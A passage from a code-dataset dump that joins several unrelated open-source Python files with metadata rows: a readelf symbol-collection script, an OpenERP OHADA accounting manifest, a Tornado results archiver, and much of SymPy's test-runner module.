'readelf -eW %s' % binary_path,
output_dir_path, os.path.basename(binary_path), '.readelf-e')
if not readelf_e_filename:
continue
readelf_debug_decodedline_file = None
if use_source_file_name:
readelf_debug_decodedline_file = _dump_command_result(
'readelf -wL %s | %s' % (binary_path, REDUCE_DEBUGLINE_PATH),
output_dir_path, os.path.basename(binary_path), '.readelf-wL')
files[entry.name] = {}
files[entry.name]['nm'] = {
'file': os.path.basename(nm_filename),
'format': 'bsd',
'mangled': False}
files[entry.name]['readelf-e'] = {
'file': os.path.basename(readelf_e_filename)}
if readelf_debug_decodedline_file:
files[entry.name]['readelf-debug-decodedline-file'] = {
'file': os.path.basename(readelf_debug_decodedline_file)}
files[entry.name]['size'] = os.stat(binary_path).st_size
with open(binary_path, 'rb') as entry_f:
md5 = hashlib.md5()
sha1 = hashlib.sha1()
chunk = entry_f.read(1024 * 1024)
while chunk:
md5.update(chunk)
sha1.update(chunk)
chunk = entry_f.read(1024 * 1024)
files[entry.name]['sha1'] = sha1.hexdigest()
files[entry.name]['md5'] = md5.hexdigest()
with open(os.path.join(output_dir_path, 'files.json'), 'w') as f:
json.dump(files, f, indent=2, sort_keys=True)
LOGGER.info('Collected symbol information at "%s".' % output_dir_path)
return output_dir_path, used_tempdir
def main():
if not sys.platform.startswith('linux'):
sys.stderr.write('This script work only on Linux.')
return 1
LOGGER.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
LOGGER.addHandler(handler)
# TODO(dmikurube): Specify |alternative_dirs| from command line.
if len(sys.argv) < 2:
sys.stderr.write("""Usage:
%s /path/to/maps [/path/to/output_data_dir/]
""" % sys.argv[0])
return 1
elif len(sys.argv) == 2:
result, _ = prepare_symbol_info(sys.argv[1])
else:
result, _ = prepare_symbol_info(sys.argv[1], sys.argv[2])
return not result
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 9,000,435,807,857,038,000 | 35.358407 | 80 | 0.653888 | false |
hbrunn/OpenUpgrade | addons/l10n_syscohada/__openerp__.py | 430 | 1940 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2011 BAAMTU SARL (<http://www.baamtu.sn>).
# contact: [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'OHADA - Accounting',
'version' : '1.0',
'author' : 'Baamtu Senegal',
'category' : 'Localization/Account Charts',
'description': """
This module implements the accounting chart for OHADA area.
===========================================================
It allows any company or association to manage its financial accounting.
Countries that use OHADA are the following:
-------------------------------------------
Benin, Burkina Faso, Cameroon, Central African Republic, Comoros, Congo,
Ivory Coast, Gabon, Guinea, Guinea Bissau, Equatorial Guinea, Mali, Niger,
Replica of Democratic Congo, Senegal, Chad, Togo.
""",
'website': 'http://www.baamtu.com',
'depends' : ['account', 'base_vat'],
'demo' : [],
'data' : ['l10n_syscohada_data.xml','l10n_syscohada_wizard.xml'],
'auto_install': False,
'installable': True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -6,111,508,458,695,258,000 | 39.416667 | 78 | 0.593299 | false |
alipsgh/tornado | archiver/archiver.py | 1 | 1542 | """
The Tornado Framework
By Ali Pesaranghader
University of Ottawa, Ontario, Canada
E-mail: apesaran -at- uottawa -dot- ca / alipsgh -at- gmail -dot- com
"""
import os
import zipfile
from os.path import basename
class Archiver:
"""
This class stores results of experiments in .zip files for future reference!
"""
@staticmethod
def archive_single(label, stats, dir_path, name, sub_name):
file_path = (dir_path + name + "_" + sub_name).lower()
stats_writer = open(file_path + ".txt", 'w')
stats_writer.write(label + "\n")
stats_writer.write(str(stats) + "\n")
stats_writer.close()
zipper = zipfile.ZipFile(file_path + ".zip", 'w')
zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt"))
zipper.close()
os.remove(file_path + ".txt")
@staticmethod
def archive_multiple(labels, stats, dir_path, name, sub_name):
file_path = (dir_path + name + "_" + sub_name).lower()
stats_writer = open(file_path + ".txt", 'w')
for i in range(0, len(labels)):
stats_writer.write(labels[i] + "\n")
stats_writer.write(str(stats[i]) + "\n")
stats_writer.close()
zipper = zipfile.ZipFile(file_path + ".zip", 'w')
zipper.write(file_path + ".txt", compress_type=zipfile.ZIP_DEFLATED, arcname=basename(file_path + ".txt"))
zipper.close()
os.remove(file_path + ".txt")
| mit | 1,227,065,012,097,761,300 | 29.469388 | 114 | 0.581712 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/sympy/utilities/runtests.py | 3 | 46156 | """
This is our testing framework.
Goals:
* it should be compatible with py.test and operate very similarly (or
identically)
* doesn't require any external dependencies
* preferably all the functionality should be in this file only
* no magic, just import the test file and execute the test functions, that's it
* portable
"""
import os
import sys
import inspect
import traceback
import pdb
import re
import linecache
from fnmatch import fnmatch
from timeit import default_timer as clock
import doctest as pdoctest # avoid clashing with our doctest() function
from doctest import DocTestFinder, DocTestRunner
import re as pre
import random
# Use sys.stdout encoding for ouput.
# This was only added to Python's doctest in Python 2.6, so we must duplicate
# it here to make utf8 files work in Python 2.5.
pdoctest._encoding = getattr(sys.__stdout__, 'encoding', None) or 'utf-8'
def _indent(s, indent=4):
"""
Add the given number of space characters to the beginning of
every non-blank line in `s`, and return the result.
If the string `s` is Unicode, it is encoded using the stdout
encoding and the `backslashreplace` error handler.
"""
if isinstance(s, unicode):
s = s.encode(pdoctest._encoding, 'backslashreplace')
# This regexp matches the start of non-blank lines:
return re.sub('(?m)^(?!$)', indent*' ', s)
pdoctest._indent = _indent
def sys_normcase(f):
if sys_case_insensitive:
return f.lower()
return f
def convert_to_native_paths(lst):
"""
Converts a list of '/' separated paths into a list of
native (os.sep separated) paths and converts to lowercase
if the system is case insensitive.
"""
newlst = []
for i, rv in enumerate(lst):
rv = os.path.join(*rv.split("/"))
# on windows the slash after the colon is dropped
if sys.platform == "win32":
pos = rv.find(':')
if pos != -1:
if rv[pos+1] != '\\':
rv = rv[:pos+1] + '\\' + rv[pos+1:]
newlst.append(sys_normcase(rv))
return newlst
def get_sympy_dir():
"""
Returns the root sympy directory and set the global value
indicating whether the system is case sensitive or not.
"""
global sys_case_insensitive
this_file = os.path.abspath(__file__)
sympy_dir = os.path.join(os.path.dirname(this_file), "..", "..")
sympy_dir = os.path.normpath(sympy_dir)
sys_case_insensitive = (os.path.isdir(sympy_dir) and
os.path.isdir(sympy_dir.lower()) and
os.path.isdir(sympy_dir.upper()))
return sys_normcase(sympy_dir)
def isgeneratorfunction(object):
"""
Return true if the object is a user-defined generator function.
Generator function objects provides same attributes as functions.
See isfunction.__doc__ for attributes listing.
Adapted from Python 2.6.
"""
CO_GENERATOR = 0x20
if (inspect.isfunction(object) or inspect.ismethod(object)) and \
object.func_code.co_flags & CO_GENERATOR:
return True
return False
def setup_pprint():
from sympy import pprint_use_unicode, init_printing
# force pprint to be in ascii mode in doctests
pprint_use_unicode(False)
# hook our nice, hash-stable strprinter
init_printing(pretty_print=False)
def test(*paths, **kwargs):
"""
Run all tests in test_*.py files which match any of the given
strings in `paths` or all tests if paths=[].
Notes:
o if sort=False, tests are run in random order (not default).
o paths can be entered in native system format or in unix,
forward-slash format.
Examples:
>> import sympy
Run all tests:
>> sympy.test()
Run one file:
>> sympy.test("sympy/core/tests/test_basic.py")
>> sympy.test("_basic")
Run all tests in sympy/functions/ and some particular file:
>> sympy.test("sympy/core/tests/test_basic.py", "sympy/functions")
Run all tests in sympy/core and sympy/utilities:
>> sympy.test("/core", "/util")
Run specific test from a file:
>> sympy.test("sympy/core/tests/test_basic.py", kw="test_equality")
Run the tests with verbose mode on:
>> sympy.test(verbose=True)
Don't sort the test output:
>> sympy.test(sort=False)
Turn on post-mortem pdb:
>> sympy.test(pdb=True)
Turn off colors:
>> sympy.test(colors=False)
The traceback verboseness can be set to "short" or "no" (default is "short")
>> sympy.test(tb='no')
"""
verbose = kwargs.get("verbose", False)
tb = kwargs.get("tb", "short")
kw = kwargs.get("kw", "")
post_mortem = kwargs.get("pdb", False)
colors = kwargs.get("colors", True)
sort = kwargs.get("sort", True)
seed = kwargs.get("seed", None)
if seed is None:
seed = random.randrange(100000000)
r = PyTestReporter(verbose, tb, colors)
t = SymPyTests(r, kw, post_mortem, seed)
# Disable warnings for external modules
import sympy.external
sympy.external.importtools.WARN_OLD_VERSION = False
sympy.external.importtools.WARN_NOT_INSTALLED = False
test_files = t.get_test_files('sympy')
if len(paths) == 0:
t._testfiles.extend(test_files)
else:
paths = convert_to_native_paths(paths)
matched = []
for f in test_files:
basename = os.path.basename(f)
for p in paths:
if p in f or fnmatch(basename, p):
matched.append(f)
break
t._testfiles.extend(matched)
return t.test(sort=sort)
def doctest(*paths, **kwargs):
"""
Runs doctests in all *py files in the sympy directory which match
any of the given strings in `paths` or all tests if paths=[].
Note:
o paths can be entered in native system format or in unix,
forward-slash format.
o files that are on the blacklist can be tested by providing
their path; they are only excluded if no paths are given.
Examples:
>> import sympy
Run all tests:
>> sympy.doctest()
Run one file:
>> sympy.doctest("sympy/core/basic.py")
>> sympy.doctest("polynomial.txt")
Run all tests in sympy/functions/ and some particular file:
>> sympy.doctest("/functions", "basic.py")
Run any file having polynomial in its name, doc/src/modules/polynomial.txt,
sympy\functions\special\polynomials.py, and sympy\polys\polynomial.py:
>> sympy.doctest("polynomial")
"""
normal = kwargs.get("normal", False)
verbose = kwargs.get("verbose", False)
blacklist = kwargs.get("blacklist", [])
blacklist.extend([
"doc/src/modules/mpmath", # needs to be fixed upstream
"sympy/mpmath", # needs to be fixed upstream
"doc/src/modules/plotting.txt", # generates live plots
"sympy/plotting", # generates live plots
"sympy/utilities/compilef.py", # needs tcc
"sympy/utilities/autowrap.py", # needs installed compiler
"sympy/galgebra/GA.py", # needs numpy
"sympy/galgebra/latex_ex.py", # needs numpy
"sympy/conftest.py", # needs py.test
"sympy/utilities/benchmarking.py", # needs py.test
])
blacklist = convert_to_native_paths(blacklist)
# Disable warnings for external modules
import sympy.external
sympy.external.importtools.WARN_OLD_VERSION = False
sympy.external.importtools.WARN_NOT_INSTALLED = False
r = PyTestReporter(verbose)
t = SymPyDocTests(r, normal)
test_files = t.get_test_files('sympy')
not_blacklisted = [f for f in test_files
if not any(b in f for b in blacklist)]
if len(paths) == 0:
t._testfiles.extend(not_blacklisted)
else:
# take only what was requested...but not blacklisted items
# and allow for partial match anywhere or fnmatch of name
paths = convert_to_native_paths(paths)
matched = []
for f in not_blacklisted:
basename = os.path.basename(f)
for p in paths:
if p in f or fnmatch(basename, p):
matched.append(f)
break
t._testfiles.extend(matched)
# run the tests and record the result for this *py portion of the tests
if t._testfiles:
failed = not t.test()
else:
failed = False
# test *txt files only if we are running python newer than 2.4
if sys.version_info[:2] > (2,4):
# N.B.
# --------------------------------------------------------------------
# Here we test *.txt files at or below doc/src. Code from these must
# be self supporting in terms of imports since there is no importing
# of necessary modules by doctest.testfile. If you try to pass *.py
# files through this they might fail because they will lack the needed
# imports and smarter parsing that can be done with source code.
#
test_files = t.get_test_files('doc/src', '*.txt', init_only=False)
test_files.sort()
not_blacklisted = [f for f in test_files
if not any(b in f for b in blacklist)]
if len(paths) == 0:
matched = not_blacklisted
else:
# Take only what was requested as long as it's not on the blacklist.
# Paths were already made native in *py tests so don't repeat here.
# There's no chance of having a *py file slip through since we
# only have *txt files in test_files.
matched = []
for f in not_blacklisted:
basename = os.path.basename(f)
for p in paths:
if p in f or fnmatch(basename, p):
matched.append(f)
break
setup_pprint()
first_report = True
for txt_file in matched:
if not os.path.isfile(txt_file):
continue
old_displayhook = sys.displayhook
try:
# out = pdoctest.testfile(txt_file, module_relative=False, encoding='utf-8',
# optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE)
out = sympytestfile(txt_file, module_relative=False, encoding='utf-8',
optionflags=pdoctest.ELLIPSIS | pdoctest.NORMALIZE_WHITESPACE)
finally:
# make sure we return to the original displayhook in case some
# doctest has changed that
sys.displayhook = old_displayhook
txtfailed, tested = out
if tested:
failed = txtfailed or failed
if first_report:
first_report = False
msg = 'txt doctests start'
lhead = '='*((80 - len(msg))//2 - 1)
rhead = '='*(79 - len(msg) - len(lhead) - 1)
print ' '.join([lhead, msg, rhead])
print
# use as the id, everything past the first 'sympy'
file_id = txt_file[txt_file.find('sympy') + len('sympy') + 1:]
print file_id, # get at least the name out so it is know who is being tested
wid = 80 - len(file_id) - 1 #update width
test_file = '[%s]' % (tested)
report = '[%s]' % (txtfailed or 'OK')
print ''.join([test_file,' '*(wid-len(test_file)-len(report)), report])
# the doctests for *py will have printed this message already if there was
# a failure, so now only print it if there was intervening reporting by
# testing the *txt as evidenced by first_report no longer being True.
if not first_report and failed:
print
print("DO *NOT* COMMIT!")
return not failed
# The Python 2.5 doctest runner uses a tuple, but in 2.6+, it uses a namedtuple
# (which doesn't exist in 2.5-)
if sys.version_info[:2] > (2,5):
from collections import namedtuple
SymPyTestResults = namedtuple('TestResults', 'failed attempted')
else:
SymPyTestResults = lambda a, b: (a, b)
def sympytestfile(filename, module_relative=True, name=None, package=None,
globs=None, verbose=None, report=True, optionflags=0,
extraglobs=None, raise_on_error=False,
parser=pdoctest.DocTestParser(), encoding=None):
"""
Test examples in the given file. Return (#failures, #tests).
Optional keyword arg "module_relative" specifies how filenames
should be interpreted:
- If "module_relative" is True (the default), then "filename"
specifies a module-relative path. By default, this path is
relative to the calling module's directory; but if the
"package" argument is specified, then it is relative to that
package. To ensure os-independence, "filename" should use
"/" characters to separate path segments, and should not
be an absolute path (i.e., it may not begin with "/").
- If "module_relative" is False, then "filename" specifies an
os-specific path. The path may be absolute or relative (to
the current working directory).
Optional keyword arg "name" gives the name of the test; by default
use the file's basename.
Optional keyword argument "package" is a Python package or the
name of a Python package whose directory should be used as the
base directory for a module relative filename. If no package is
specified, then the calling module's directory is used as the base
directory for module relative filenames. It is an error to
specify "package" if "module_relative" is False.
Optional keyword arg "globs" gives a dict to be used as the globals
when executing examples; by default, use {}. A copy of this dict
is actually used for each docstring, so that each docstring's
examples start with a clean slate.
Optional keyword arg "extraglobs" gives a dictionary that should be
merged into the globals that are used to execute examples. By
default, no extra globals are used.
Optional keyword arg "verbose" prints lots of stuff if true, prints
only failures if false; by default, it's true iff "-v" is in sys.argv.
Optional keyword arg "report" prints a summary at the end when true,
else prints nothing at the end. In verbose mode, the summary is
detailed, else very brief (in fact, empty if all tests passed).
Optional keyword arg "optionflags" or's together module constants,
and defaults to 0. Possible values (see the docs for details):
DONT_ACCEPT_TRUE_FOR_1
DONT_ACCEPT_BLANKLINE
NORMALIZE_WHITESPACE
ELLIPSIS
SKIP
IGNORE_EXCEPTION_DETAIL
REPORT_UDIFF
REPORT_CDIFF
REPORT_NDIFF
REPORT_ONLY_FIRST_FAILURE
Optional keyword arg "raise_on_error" raises an exception on the
first unexpected exception or failure. This allows failures to be
post-mortem debugged.
Optional keyword arg "parser" specifies a DocTestParser (or
subclass) that should be used to extract tests from the files.
Optional keyword arg "encoding" specifies an encoding that should
be used to convert the file to unicode.
Advanced tomfoolery: testmod runs methods of a local instance of
class doctest.Tester, then merges the results into (or creates)
global Tester instance doctest.master. Methods of doctest.master
can be called directly too, if you want to do something unusual.
Passing report=0 to testmod is especially useful then, to delay
displaying a summary. Invoke doctest.master.summarize(verbose)
when you're done fiddling.
"""
if package and not module_relative:
raise ValueError("Package may only be specified for module-"
"relative paths.")
# Relativize the path
text, filename = pdoctest._load_testfile(filename, package, module_relative)
# If no name was given, then use the file's name.
if name is None:
name = os.path.basename(filename)
# Assemble the globals.
if globs is None:
globs = {}
else:
globs = globs.copy()
if extraglobs is not None:
globs.update(extraglobs)
if '__name__' not in globs:
globs['__name__'] = '__main__'
if raise_on_error:
runner = pdoctest.DebugRunner(verbose=verbose, optionflags=optionflags)
else:
runner = SymPyDocTestRunner(verbose=verbose, optionflags=optionflags)
if encoding is not None:
text = text.decode(encoding)
# Read the file, convert it to a test, and run it.
test = parser.get_doctest(text, globs, name, filename, 0)
runner.run(test)
if report:
runner.summarize()
if pdoctest.master is None:
pdoctest.master = runner
else:
pdoctest.master.merge(runner)
return SymPyTestResults(runner.failures, runner.tries)
class SymPyTests(object):
def __init__(self, reporter, kw="", post_mortem=False,
seed=random.random()):
self._post_mortem = post_mortem
self._kw = kw
self._count = 0
self._root_dir = sympy_dir
self._reporter = reporter
self._reporter.root_dir(self._root_dir)
self._testfiles = []
self._seed = seed
def test(self, sort=False):
"""
Runs the tests returning True if all tests pass, otherwise False.
If sort=False run tests in random order.
"""
if sort:
self._testfiles.sort()
else:
from random import shuffle
random.seed(self._seed)
shuffle(self._testfiles)
self._reporter.start(self._seed)
for f in self._testfiles:
try:
self.test_file(f)
except KeyboardInterrupt:
print " interrupted by user"
break
return self._reporter.finish()
def test_file(self, filename):
name = "test%d" % self._count
name = os.path.splitext(os.path.basename(filename))[0]
self._count += 1
gl = {'__file__':filename}
random.seed(self._seed)
try:
execfile(filename, gl)
except (ImportError, SyntaxError):
self._reporter.import_error(filename, sys.exc_info())
return
pytestfile = ""
if "XFAIL" in gl:
pytestfile = inspect.getsourcefile(gl["XFAIL"])
disabled = gl.get("disabled", False)
if disabled:
funcs = []
else:
# we need to filter only those functions that begin with 'test_'
# that are defined in the testing file or in the file where
# is defined the XFAIL decorator
funcs = [gl[f] for f in gl.keys() if f.startswith("test_") and
(inspect.isfunction(gl[f])
or inspect.ismethod(gl[f])) and
(inspect.getsourcefile(gl[f]) == filename or
inspect.getsourcefile(gl[f]) == pytestfile)]
# Sorting of XFAILed functions isn't fixed yet :-(
funcs.sort(key=lambda x: inspect.getsourcelines(x)[1])
i = 0
while i < len(funcs):
if isgeneratorfunction(funcs[i]):
# some tests can be generators, that return the actual
# test functions. We unpack it below:
f = funcs.pop(i)
for fg in f():
func = fg[0]
args = fg[1:]
fgw = lambda: func(*args)
funcs.insert(i, fgw)
i += 1
else:
i += 1
# drop functions that are not selected with the keyword expression:
funcs = [x for x in funcs if self.matches(x)]
if not funcs:
return
self._reporter.entering_filename(filename, len(funcs))
for f in funcs:
self._reporter.entering_test(f)
try:
f()
except KeyboardInterrupt:
raise
except:
t, v, tr = sys.exc_info()
if t is AssertionError:
self._reporter.test_fail((t, v, tr))
if self._post_mortem:
pdb.post_mortem(tr)
elif t.__name__ == "Skipped":
self._reporter.test_skip(v)
elif t.__name__ == "XFail":
self._reporter.test_xfail()
elif t.__name__ == "XPass":
self._reporter.test_xpass(v)
else:
self._reporter.test_exception((t, v, tr))
if self._post_mortem:
pdb.post_mortem(tr)
else:
self._reporter.test_pass()
self._reporter.leaving_filename()
def matches(self, x):
"""
Does the keyword expression self._kw match "x"? Returns True/False.
Always returns True if self._kw is "".
"""
if self._kw == "":
return True
return x.__name__.find(self._kw) != -1
def get_test_files(self, dir, pat = 'test_*.py'):
"""
Returns the list of test_*.py (default) files at or below directory
`dir` relative to the sympy home directory.
"""
dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0])
g = []
for path, folders, files in os.walk(dir):
g.extend([os.path.join(path, f) for f in files if fnmatch(f, pat)])
return [sys_normcase(gi) for gi in g]
class SymPyDocTests(object):
def __init__(self, reporter, normal):
self._count = 0
self._root_dir = sympy_dir
self._reporter = reporter
self._reporter.root_dir(self._root_dir)
self._normal = normal
self._testfiles = []
def test(self):
"""
Runs the tests and returns True if all tests pass, otherwise False.
"""
self._reporter.start()
for f in self._testfiles:
try:
self.test_file(f)
except KeyboardInterrupt:
print " interrupted by user"
break
return self._reporter.finish()
def test_file(self, filename):
import unittest
from StringIO import StringIO
rel_name = filename[len(self._root_dir)+1:]
module = rel_name.replace(os.sep, '.')[:-3]
setup_pprint()
try:
module = pdoctest._normalize_module(module)
tests = SymPyDocTestFinder().find(module)
except:
self._reporter.import_error(filename, sys.exc_info())
return
tests = [test for test in tests if len(test.examples) > 0]
# By default (except for python 2.4 in which it was broken) tests
# are sorted by alphabetical order by function name. We sort by line number
# so one can edit the file sequentially from bottom to top...HOWEVER
# if there are decorated functions, their line numbers will be too large
# and for now one must just search for these by text and function name.
tests.sort(key=lambda x: -x.lineno)
if not tests:
return
self._reporter.entering_filename(filename, len(tests))
for test in tests:
assert len(test.examples) != 0
runner = SymPyDocTestRunner(optionflags=pdoctest.ELLIPSIS | \
pdoctest.NORMALIZE_WHITESPACE)
old = sys.stdout
new = StringIO()
sys.stdout = new
# If the testing is normal, the doctests get importing magic to
# provide the global namespace. If not normal (the default) then
# then must run on their own; all imports must be explicit within
# a function's docstring. Once imported that import will be
# available to the rest of the tests in a given function's
# docstring (unless clear_globs=True below).
if not self._normal:
test.globs = {}
# if this is uncommented then all the test would get is what
# comes by default with a "from sympy import *"
#exec('from sympy import *') in test.globs
try:
f, t = runner.run(test, out=new.write, clear_globs=False)
finally:
sys.stdout = old
if f > 0:
self._reporter.doctest_fail(test.name, new.getvalue())
else:
self._reporter.test_pass()
self._reporter.leaving_filename()
def get_test_files(self, dir, pat='*.py', init_only=True):
"""
Returns the list of *py files (default) from which docstrings
will be tested which are at or below directory `dir`. By default,
only those that have an __init__.py in their parent directory
and do not start with `test_` will be included.
"""
def importable(x):
"""
Checks if given pathname x is an importable module by checking for
__init__.py file.
Returns True/False.
Currently we only test if the __init__.py file exists in the
directory with the file "x" (in theory we should also test all the
parent dirs).
"""
init_py = os.path.join(os.path.dirname(x), "__init__.py")
return os.path.exists(init_py)
dir = os.path.join(self._root_dir, convert_to_native_paths([dir])[0])
g = []
for path, folders, files in os.walk(dir):
g.extend([os.path.join(path, f) for f in files
if not f.startswith('test_') and fnmatch(f, pat)])
if init_only:
# skip files that are not importable (i.e. missing __init__.py)
g = [x for x in g if importable(x)]
return [sys_normcase(gi) for gi in g]
class SymPyDocTestFinder(DocTestFinder):
"""
A class used to extract the DocTests that are relevant to a given
object, from its docstring and the docstrings of its contained
objects. Doctests can currently be extracted from the following
object types: modules, functions, classes, methods, staticmethods,
classmethods, and properties.
Modified from doctest's version by looking harder for code in the
case that it looks like the the code comes from a different module.
In the case of decorated functions (e.g. @vectorize) they appear
to come from a different module (e.g. multidemensional) even though
their code is not there.
"""
def _find(self, tests, obj, name, module, source_lines, globs, seen):
"""
Find tests for the given object and any contained objects, and
add them to `tests`.
"""
if self._verbose:
print 'Finding tests in %s' % name
# If we've already processed this object, then ignore it.
if id(obj) in seen:
return
seen[id(obj)] = 1
# Make sure we don't run doctests for classes outside of sympy, such
# as in numpy or scipy.
if inspect.isclass(obj):
if obj.__module__.split('.')[0] != 'sympy':
return
# Find a test for this object, and add it to the list of tests.
test = self._get_test(obj, name, module, globs, source_lines)
if test is not None:
tests.append(test)
# Look for tests in a module's contained objects.
if inspect.ismodule(obj) and self._recurse:
for rawname, val in obj.__dict__.items():
# Recurse to functions & classes.
if inspect.isfunction(val) or inspect.isclass(val):
in_module = self._from_module(module, val)
if not in_module:
# double check in case this function is decorated
# and just appears to come from a different module.
pat = r'\s*(def|class)\s+%s\s*\(' % rawname
PAT = pre.compile(pat)
in_module = any(PAT.match(line) for line in source_lines)
if in_module:
try:
valname = '%s.%s' % (name, rawname)
self._find(tests, val, valname, module, source_lines, globs, seen)
except ValueError, msg:
raise
except:
pass
# Look for tests in a module's __test__ dictionary.
if inspect.ismodule(obj) and self._recurse:
for valname, val in getattr(obj, '__test__', {}).items():
if not isinstance(valname, basestring):
raise ValueError("SymPyDocTestFinder.find: __test__ keys "
"must be strings: %r" %
(type(valname),))
if not (inspect.isfunction(val) or inspect.isclass(val) or
inspect.ismethod(val) or inspect.ismodule(val) or
isinstance(val, basestring)):
raise ValueError("SymPyDocTestFinder.find: __test__ values "
"must be strings, functions, methods, "
"classes, or modules: %r" %
(type(val),))
valname = '%s.__test__.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
# Look for tests in a class's contained objects.
if inspect.isclass(obj) and self._recurse:
for valname, val in obj.__dict__.items():
# Special handling for staticmethod/classmethod.
if isinstance(val, staticmethod):
val = getattr(obj, valname)
if isinstance(val, classmethod):
val = getattr(obj, valname).im_func
# Recurse to methods, properties, and nested classes.
if (inspect.isfunction(val) or
inspect.isclass(val) or
isinstance(val, property)):
in_module = self._from_module(module, val)
if not in_module:
# "double check" again
pat = r'\s*(def|class)\s+%s\s*\(' % valname
PAT = pre.compile(pat)
in_module = any(PAT.match(line) for line in source_lines)
if in_module:
valname = '%s.%s' % (name, valname)
self._find(tests, val, valname, module, source_lines,
globs, seen)
def _get_test(self, obj, name, module, globs, source_lines):
"""
Return a DocTest for the given object, if it defines a docstring;
otherwise, return None.
"""
# Extract the object's docstring. If it doesn't have one,
# then return None (no test for this object).
if isinstance(obj, basestring):
docstring = obj
else:
try:
if obj.__doc__ is None:
docstring = ''
else:
docstring = obj.__doc__
if not isinstance(docstring, basestring):
docstring = str(docstring)
except (TypeError, AttributeError):
docstring = ''
# Find the docstring's location in the file.
lineno = self._find_lineno(obj, source_lines)
if lineno is None:
# if None, then _find_lineno couldn't find the docstring.
# But IT IS STILL THERE. Likely it was decorated or something
# (i.e., @property docstrings have lineno == None)
# TODO: Write our own _find_lineno that is smarter in this regard
# Until then, just give it a dummy lineno. This is just used for
# sorting the tests, so the only bad effect is that they will appear
# last instead of the order that they really are in the file.
# lineno is also used to report the offending line of a failing
# doctest, which is another reason to fix this. See issue 1947.
lineno = 0
# Don't bother if the docstring is empty.
if self._exclude_empty and not docstring:
return None
# Return a DocTest for this object.
if module is None:
filename = None
else:
filename = getattr(module, '__file__', module.__name__)
if filename[-4:] in (".pyc", ".pyo"):
filename = filename[:-1]
return self._parser.get_doctest(docstring, globs, name,
filename, lineno)
class SymPyDocTestRunner(DocTestRunner):
"""
A class used to run DocTest test cases, and accumulate statistics.
The `run` method is used to process a single DocTest case. It
returns a tuple `(f, t)`, where `t` is the number of test cases
tried, and `f` is the number of test cases that failed.
Modified from the doctest version to not reset the sys.displayhook (see
issue 2041).
See the docstring of the original DocTestRunner for more information.
"""
def run(self, test, compileflags=None, out=None, clear_globs=True):
"""
Run the examples in `test`, and display the results using the
writer function `out`.
The examples are run in the namespace `test.globs`. If
`clear_globs` is true (the default), then this namespace will
be cleared after the test runs, to help with garbage
collection. If you would like to examine the namespace after
the test completes, then use `clear_globs=False`.
`compileflags` gives the set of flags that should be used by
the Python compiler when running the examples. If not
specified, then it will default to the set of future-import
flags that apply to `globs`.
The output of each example is checked using
`SymPyDocTestRunner.check_output`, and the results are formatted by
the `SymPyDocTestRunner.report_*` methods.
"""
self.test = test
if compileflags is None:
compileflags = pdoctest._extract_future_flags(test.globs)
save_stdout = sys.stdout
if out is None:
out = save_stdout.write
sys.stdout = self._fakeout
# Patch pdb.set_trace to restore sys.stdout during interactive
# debugging (so it's not still redirected to self._fakeout).
# Note that the interactive output will go to *our*
# save_stdout, even if that's not the real sys.stdout; this
# allows us to write test cases for the set_trace behavior.
save_set_trace = pdb.set_trace
self.debugger = pdoctest._OutputRedirectingPdb(save_stdout)
self.debugger.reset()
pdb.set_trace = self.debugger.set_trace
# Patch linecache.getlines, so we can see the example's source
# when we're inside the debugger.
self.save_linecache_getlines = pdoctest.linecache.getlines
linecache.getlines = self.__patched_linecache_getlines
try:
return self.__run(test, compileflags, out)
finally:
sys.stdout = save_stdout
pdb.set_trace = save_set_trace
linecache.getlines = self.save_linecache_getlines
if clear_globs:
test.globs.clear()
# We have to override the name mangled methods.
SymPyDocTestRunner._SymPyDocTestRunner__patched_linecache_getlines = \
DocTestRunner._DocTestRunner__patched_linecache_getlines
SymPyDocTestRunner._SymPyDocTestRunner__run = DocTestRunner._DocTestRunner__run
SymPyDocTestRunner._SymPyDocTestRunner__record_outcome = \
DocTestRunner._DocTestRunner__record_outcome
class Reporter(object):
"""
Parent class for all reporters.
"""
pass
class PyTestReporter(Reporter):
"""
Py.test like reporter. Should produce output identical to py.test.
"""
def __init__(self, verbose=False, tb="short", colors=True):
self._verbose = verbose
self._tb_style = tb
self._colors = colors
self._xfailed = 0
self._xpassed = []
self._failed = []
self._failed_doctest = []
self._passed = 0
self._skipped = 0
self._exceptions = []
# this tracks the x-position of the cursor (useful for positioning
# things on the screen), without the need for any readline library:
self._write_pos = 0
self._line_wrap = False
def root_dir(self, dir):
self._root_dir = dir
def write(self, text, color="", align="left", width=80):
"""
Prints a text on the screen.
It uses sys.stdout.write(), so no readline library is necessary.
color ... choose from the colors below, "" means default color
align ... left/right, left is a normal print, right is aligned on the
right hand side of the screen, filled with " " if necessary
width ... the screen width
"""
color_templates = (
("Black" , "0;30"),
("Red" , "0;31"),
("Green" , "0;32"),
("Brown" , "0;33"),
("Blue" , "0;34"),
("Purple" , "0;35"),
("Cyan" , "0;36"),
("LightGray" , "0;37"),
("DarkGray" , "1;30"),
("LightRed" , "1;31"),
("LightGreen" , "1;32"),
("Yellow" , "1;33"),
("LightBlue" , "1;34"),
("LightPurple" , "1;35"),
("LightCyan" , "1;36"),
("White" , "1;37"), )
colors = {}
for name, value in color_templates:
colors[name] = value
c_normal = '\033[0m'
c_color = '\033[%sm'
if align == "right":
if self._write_pos+len(text) > width:
# we don't fit on the current line, create a new line
self.write("\n")
self.write(" "*(width-self._write_pos-len(text)))
if hasattr(sys.stdout, 'isatty') and not sys.stdout.isatty():
